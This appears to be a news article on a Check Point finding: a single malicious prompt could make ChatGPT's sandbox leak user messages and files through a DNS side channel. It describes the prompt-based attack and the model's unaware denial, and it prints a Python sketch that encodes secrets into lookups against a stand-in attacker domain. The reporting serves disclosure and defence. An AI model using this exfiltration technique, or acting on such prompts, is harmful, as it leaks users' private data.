ChatGPT Security Issue Enabled Data Theft via Single Prompt

A security vulnerability in ChatGPT could be exploited with a single malicious prompt to covertly exfiltrate sensitive data from user prompts and messages.

The security issue, which enabled data exfiltration and remote code execution, was discovered by cybersecurity researchers at Check Point, who warned it could put user privacy at risk.

“A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content,” Check Point said in a blog post published on March 30.

A security update for ChatGPT was deployed on February 20 after researchers reported the issue to OpenAI.

Prior to the fix, a hidden outbound communication path from ChatGPT’s isolated execution runtime to the public internet could have put users at risk of having their messages and prompts exposed.

Many people have become accustomed to using ChatGPT and other AI assistants to manage tasks at work more efficiently. These tasks often involve sensitive corporate data, including account details and private records.

People are also using LLMs to discuss personal issues, such as their health, personal finances or mental wellbeing.

Users expect this information to remain within the system, protected from exfiltration by appropriate guardrails. However, Check Point found that it was possible to bypass these protections.

“We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation,” said researchers.

The vulnerability allowed information to be transmitted to an external server through a DNS side channel originating from the container used by ChatGPT.

Key to the issue was that the model operated under the assumption that this environment was not designed to send data outward, so when it was prompted to send data, it did not know how to mediate or resist the request.

An attacker could take advantage of this by crafting a prompt that directed ChatGPT to send information exchanged with the model outside the sandboxed environment, where the attacker could access it.
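Check Point did not publish the exact payload, but DNS side channels of this kind typically work by encoding data into the subdomain labels of lookups against an attacker-controlled domain, whose authoritative nameserver logs each query. A minimal sketch of that encoding step follows; the domain name and chunking scheme here are illustrative assumptions, not Check Point's actual technique:

```python
import binascii

# Hypothetical attacker-controlled domain; a real exfiltration channel
# would use a domain whose authoritative nameserver the attacker runs.
ATTACKER_DOMAIN = "attacker.example"

# Individual DNS labels are capped at 63 bytes, so the data must be
# chunked before it is embedded in query names.
LABEL_MAX = 63

def encode_queries(secret: str, domain: str = ATTACKER_DOMAIN) -> list[str]:
    """Hex-encode a secret and split it into DNS query names.

    Each lookup for '<seq>.<chunk>.<domain>' reaches the attacker's
    nameserver, which logs the chunk -- the data leaves the sandbox
    inside what looks like ordinary DNS traffic.
    """
    hexed = binascii.hexlify(secret.encode()).decode()
    chunks = [hexed[i:i + LABEL_MAX] for i in range(0, len(hexed), LABEL_MAX)]
    return [f"{seq}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]

queries = encode_queries("patient: Jane Doe")
# The receiver reverses the process: strip the domain and sequence
# label, concatenate the chunks in order, then hex-decode.
```

Because DNS resolution is usually permitted even from tightly restricted environments, this traffic can pass unnoticed where direct HTTP connections would be blocked.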

Third-Party Access to Private Prompts

In a proof-of-concept, Check Point uploaded a PDF containing laboratory test results, including personal information such as a patient's name, and used a malicious prompt to exploit the vulnerability.

When asked if the information had been sent to a third party, ChatGPT responded that it had not, seemingly unaware that its actions had caused a server operated by the attacker to receive highly sensitive data extracted from the conversation.

The vulnerability relied on the user entering the prompt themselves. The researchers pointed out that there are multiple ways to trick users into doing so, for example, by listing the malicious prompt on a website or social media thread about the top prompts for productivity and other terms people may search for.

“For many users, copying and pasting such prompts into a new conversation is routine and does not appear risky,” said researchers.

“A malicious prompt distributed in that format could therefore be presented as a harmless productivity aid and interpreted as just another useful trick for getting better results from the assistant.”

While it is unknown whether this vulnerability was exploited in the wild, Check Point researchers warned that as AI assistants like ChatGPT increasingly operate in environments that involve sensitive data, security must be a priority.

“As AI tools become more powerful and widely used, security must remain a central consideration. These systems offer enormous benefits, but adopting them safely requires careful attention to every layer of the platform,” the blog post concluded.

Infosecurity has contacted OpenAI for comment.

Image credit: Anton Dzhumelia / Shutterstock.com
